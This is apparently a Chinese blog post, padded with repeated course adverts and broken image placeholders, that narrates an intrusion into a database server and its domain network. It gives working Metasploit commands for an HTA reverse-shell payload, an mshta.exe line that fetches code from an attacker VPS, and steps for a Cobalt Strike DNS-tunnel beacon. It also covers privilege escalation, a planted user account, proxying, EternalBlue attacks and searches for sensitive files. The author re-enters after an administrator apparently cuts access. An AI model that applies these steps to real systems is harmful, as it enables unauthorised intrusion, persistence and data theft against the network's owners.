既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
msf5 > use exploit/windows/misc/hta_servermsf5 exploit(windows/misc/hta_server) > set payload windows/meterpreter/reverse_httppayload => windows/meterpreter/reverse_httpmsf5 exploit(windows/misc/hta_server) > set lhost VPS_IPlhost => VPS_IP
这里就开始监听断开,然后需要在对方哪里执行命令。
如下
接着在执行 mshta.exe http://VPS_IP:8080/IAKWSlu.hta
执行之后对方直接上线MSF了,这里可以看到对方的主机名称就叫DATABASE.
看似一切顺利,但是往往都不会如自己想的那样,上线之后一直不能执行命令,都返回超时。在VPS的流量过去应该也不会有多大的阻碍啊!
也许是被对方的一些设备拦截了吧!
既然MSF不能操作的话,SQLMAP提供的shell也不是很好操作,那么可以试着写入webshell进入到对方主机上面。
但是我查找了一番并无WEB路径,这里时候想起了它的主机名称,会不会是一个站库分离的网站。
对于MSSQL注入查询是否站库分离很简单
select @@servernameselect host_name()
果不其然这里的确就是站库分离。
既然是MSF的流量比较明显,也不能写入webshell,那么我现在就希望能让其上线CobaltStrike吧!
经过一番测试发现HTTP流量也是返回不了Beacon那么我就使用DNS隧道来上线。
首先需要配置域名解析到CS的服务器上面,并且执行NS记录。这里就略过过程了。
首先生成DNS隧道监听。主机这里填写A记录
接着会弹出来要给框,这里需要填写的就是填写域名解析的NS记录了!
接着使用powershell来让其上线,但是发现在SQLMAP的shell中这里显示无法使用powershell。
这里可能是用户的原因吧!这里的用户是mssql用户。
如果不能使用Powershell上线,那么可以使用CS的hta文件上线。
利用CS生成hta文件然后挂到CS服务器上面,接着在shell中顺利执行,并且CS上线小黑框!看来上线有望了!
使用tcpdump监听53端口的流量,可以看到这里目标已经开始连接CS服务器了!
上线之后,使用ipconfig /all查看当前IP。
发现DNS这里存在域名,这里初步推测是存在域环境的。
并且当前的主机在10段的网段中。在往下看可以看到DNS服务器由两个IP地址。
这里初步推断这就是域控了!
因为一般安装域控的话都会安装DNS服务器,并且解析到域控上面!
接着使用systeminfo来查看主机的信息。可以看到系统是windows2012的系统,并且可以确定的是由域环境。
并且但是打的补丁很多,当前的权限是mssql权限,必须提权才能进行下一步渗透!
试ping一下DNS的主机名称。
是可以ping的通的完全没有问题,如果不同的话也不应该哈哈哈!!
可以看到DNS的IP地址为10.10.10.2。
如果这个域不大的话那么应该可能这个就是域控了!但是奇怪的就是有的时候也会出现10.10.10.4!
还有就是!当我访问www的域名的时候,它会给我转跳到web的域名上面去。
所以我怀疑10.10.10.1这台主机并不是真正的提供WEB的服务器!
也就是不是JoomlaCMS这个WEB的服务器
接着对内网的机器进行探测,这里可以使用K8gege的龙珠插件,对这个网段进行探测。最后在进行判断。
这个域是由三个DNS服务器的!
并且从探测信息返回的主机名称看,这三个DNS服务器就是域控了!
并且WEB服务器就是10.10.10.1这台服务器,因为在先前判断站库分离的时候已经知道WEB服务器的名称了!
接下来就开始提权了!这里可以利用systeminfo输入的补丁信息复制到提权辅助页面上面进行补丁比对
https://bugs.hacking8.com/tiquan/
也可也利用MSF上面的post模块上的本地提权插件来进行获取提权漏洞信息。
这里我把会话传递到MSF上,并且使用本地提权查询模块
msf5 exploit(windows/misc/hta_server) > use post/multi/recon/local_exploit_suggestermsf5 post(multi/recon/local_exploit_suggester) > set session 1msf5 post(multi/recon/local_exploit_suggester) > run
这里MSF返回信息说可以利用ms16-075。话不多说直接提权开搞!
利用CS的本地提权插件里面的potato提权漏洞进行提取成功。
提取到了system权限本来是可以获取对方的哈希的,因为是windows 2012的操作系统这里无法获取明文。
但是这台机器开启了LSA保护吧!连mimikatz都不能执行了,返回5结尾的报错!
所以我直接创建一个用户用于等下连接3389
接下来可以利用代理进入对方的内网,我测试了一下CS自带的socks代理并不是很好,有的时候会卡住。
这里我选择上传iox来进行代理
进入内网之后直接开搞!首先可以对内网的永恒之蓝的机器进行扫描。
成功扫描除了10.10.10.41和10.10.10.37这两台机器是存在永恒之蓝漏洞的!
这里我直接打10.10.10.41,它的操作系统是windows 7 。10.10.10.37是windows 2003的系统先不搞!
MSF给我连续打了好几波!但是都没有成功!这里应该是失败了!
对端设备有防火墙或者杀软的软件拦截了吧。
三、 失去权限!重新再次进入内网
这个时候已经是晚上四点钟了,肝不下去了直接睡觉!谁知道第二天一起来CS的Beacon已经掉线,并且还上线不了了!!!!
可能管理员已经发现并且加固了服务器了!
如果对方没有把我的VPS禁止的话那还行可以继续进行渗透的!
首先再VPS上面进行icmp流量!
然后在目标Ping服务器,发现流量是可以通的
上次上传的iox已经被管理员给删除了,接下来的话需要在下载过去。
接着测试HTTP流量也是完全可以的。两端可以通讯HTTP流量。
那么就可以通过VPS开启HTTP服务下载软件到对方的服务器上面
这里我不选择iox来进行代理了,应为我现在已经失去了一个CS的稳定控制,这里我选择VENOM这个代理工具,这个代理工具在代理成功之后可以使用shell命令获取一个CMD的shell。
这里就可以免去SQLMAP那个shell了!!
接着代理进去之后本来想用之前创建的账号进行登陆的,但是当时没有创建隐藏用户,登陆不上去了。
这个时候我对这台数据库进行信息收集,既然是数据库服务器,那么敏感的信息一定有。可以使用如下命令进行
dir /s /b *.txtdir /s /b *.batdir /s /b *.xml
这里我在C盘的目录下惊喜的发现,这有敏感的批处理文件,名字大概的意思就是备份数据库。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
ga-1715292568354)]
[外链图片转存中…(img-RfXLcYoF-1715292568355)]
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上软件测试知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新